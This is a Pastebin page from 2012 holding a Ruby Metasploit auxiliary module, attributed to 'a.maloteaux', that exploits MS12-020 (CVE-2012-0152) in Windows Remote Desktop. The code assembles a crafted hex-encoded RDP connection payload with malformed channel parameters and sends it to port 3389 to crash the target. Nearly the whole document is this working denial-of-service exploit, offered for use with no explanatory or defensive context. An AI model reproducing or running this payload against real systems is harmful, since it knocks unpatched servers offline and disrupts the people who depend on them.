Advertisement
Guest User

ms12-020 metasploit dos module

a guest
Mar 18th, 2012
1,847
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. class Metasploit3 < Msf::Auxiliary
  2.  
  3. include Msf::Exploit::Remote::Tcp
  4. include Msf::Auxiliary::Dos
  5.  
  6. def initialize(info = {})
  7. super(update_info(info,
  8. 'Name' => 'ms12-020',
  9. 'Description' => %q{
  10. MS12-020
  11. },
  12. 'Author' => [ 'a.maloteaux' ],
  13. 'License' => MSF_LICENSE,
  14. 'Version' => '$Revision: 14976 $',
  15. 'References' =>
  16. [
  17. [ 'CVE', '2012-0152' ],
  18. [ 'MSB', 'MS12-020'],
  19. [ 'OSVDB', '80004' ],
  20. [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
  21. ],
  22. 'DisclosureDate' => 'Mar 03 2012'))
  23.  
  24. register_options(
  25. [
  26. Opt::RPORT(3389)
  27. ], self.class )
  28. end
  29.  
  30. def run
  31. client_name = ::Rex::Text::to_unicode(::Rex::Text::rand_text_alphanumeric(15 - rand(10)).ljust(16,"\x00"), 'utf-16le')
  32. client_product_id = "#{::Rex::Text::rand_text_numeric(5)}-#{::Rex::Text::rand_text_numeric(3)}-#{::Rex::Text::rand_text_numeric(7)}-#{::Rex::Text::rand_text_numeric(5)}"
  33. client_product_id = ::Rex::Text::to_unicode(client_product_id.ljust(32,"\x00"))
  34.  
  35. payload = "030000130EE000000000000100080000000000".to_a.pack("H*")
  36. #MCS Connect Initial PDU with GCC Conference Create Request
  37. payload << "030001a002f0807f6582019404010104".to_a.pack("H*")
  38. payload << "01010101ff3019".to_a.pack("H*")
  39. payload << "020100".to_a.pack("H*") #ChannelIds = 0
  40. payload << "020102020100".to_a.pack("H*")
  41. payload << "0201010201000201010202ffff020102".to_a.pack("H*")
  42. payload << "30190201010201010201010201010201".to_a.pack("H*")
  43. payload << "0002010102020420020102301c0202ff".to_a.pack("H*")
  44. payload << "ff0202fc170202ffff02010102010002".to_a.pack("H*")
  45. payload << "01010202ffff02010204820133000500".to_a.pack("H*")
  46. payload << "147c0001812a000800100001c0004475".to_a.pack("H*")
  47. payload << "6361811c01c0d8000400080000050004".to_a.pack("H*")
  48. payload << "01ca03aa09040000ce0e0000".to_a.pack("H*")
  49. payload << client_name
  50. payload << "04000000".to_a.pack("H*")
  51. payload << "000000000c0000000000000000000000".to_a.pack("H*")
  52. payload << "00000000000000000000000000000000".to_a.pack("H*")
  53. payload << "00000000000000000000000000000000".to_a.pack("H*")
  54. payload << "00000000000000000000000000000000".to_a.pack("H*")
  55. payload << "000000000000000001ca010000000000".to_a.pack("H*")
  56. payload << "180007000100".to_a.pack("H*")
  57. payload << client_product_id
  58. payload << "00000000000004c00c00".to_a.pack("H*")
  59. payload << "0d0000000000000002c00c001b000000".to_a.pack("H*")
  60. payload << "0000000003c02c000300000072647064".to_a.pack("H*")
  61. payload << "7200000000008080636c697072647200".to_a.pack("H*")
  62. payload << "0000a0c0726470736e640000000000c0".to_a.pack("H*")
  63. #User Request PDU
  64. payload << "0300000802f08028".to_a.pack("H*")
  65.  
  66. begin
  67. connect
  68. sock.put(payload)
  69. Kernel.select(nil, nil, nil, 2)
  70. rescue
  71. print_error("Server not available")
  72. end
  73. end
  74. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement